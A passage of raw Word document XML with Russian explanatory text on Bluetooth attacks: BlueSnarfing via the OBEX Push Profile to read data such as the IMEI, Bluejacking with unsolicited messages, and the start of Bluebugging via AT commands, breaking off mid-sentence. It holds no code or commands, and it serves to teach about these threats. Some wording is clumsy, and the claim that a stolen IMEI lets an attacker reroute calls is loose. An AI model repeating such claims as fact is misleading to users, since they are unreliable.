      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00731752">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>эксплуатируя</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>уязвимость</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>прошивки</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>старых</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройствах.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Эта</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>атака</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>позволяет</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>подключение</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройству</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00731752">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>предоставляя</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>доступ</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>данным,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>хранящимся</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройстве</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>том</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>числе</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>международного</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>идентичности</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>мобильного</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>оборудования</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройства</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>(IMEI).</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>IMEI</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>представляет</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>собой</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>уникальный</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>идентификатор</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>каждого</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройства,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>что</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>злоумышленник</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>может</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>потенциально</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>использовать</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>маршрутизации</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>всех</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>входящих</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>вызовов</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройства</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>пользователя</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройству</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>злоумышленника</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Атака</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>BlueSnarfing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>впервые</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>была</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>использована</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>2003</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>году</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>за</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>короткое</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>время</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>завоевала</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>большую</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>популярность</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>среди</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>атак</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00731752">
        <w:t>-устройства.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Атака</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>использует</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>сервис</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>OPP</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>(OBEX</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Push</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Profile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00731752">
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>который</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>применяется</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>простого</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>обмена</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>визитными</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>карточками</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>другими</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>файлами. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00B66422" w:rsidRDefault="00731752" w:rsidP="00B66422">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66422">
        <w:t>Bluejacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B66422">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00731752" w:rsidRDefault="00731752" w:rsidP="00B66422">
      <w:r w:rsidRPr="00731752">
        <w:t>Злоумышленник</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>инициирует</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluejacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>отправив</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>нежелательные</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>сообщения</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>пользователя</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B66422" w:rsidRPr="00B66422">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройства.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Фактически</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>данные</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>сообщения</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>не</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>нанесут</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>вред</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройству</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>пользователя,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>но</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>они</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>могут</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>побудить</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>пользователя</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>как-то</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>отреагировать.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Эта</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>атака</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>напоминает</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>спам</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>фишинг-атак,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>проводимых</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>против</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>пользователей</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>электронной</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>почты.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluejacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>может</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>причинить</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>вред,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>если</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>пользователь</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>инициирует</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>реакцию</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluejacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>сообщения,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>отправленного</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>вредными</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>намерениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00731752" w:rsidRDefault="00731752" w:rsidP="00B66422">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731752">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bluebugging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00731752" w:rsidRDefault="00731752" w:rsidP="00B66422">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:lastRenderedPageBreak/>
        <w:t>Bluebugging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>одна</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>из</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>опасных</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>атак</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>позволяет</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>выполнять</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>AT-команды</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>мобильном</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>телефоне.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Данный</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
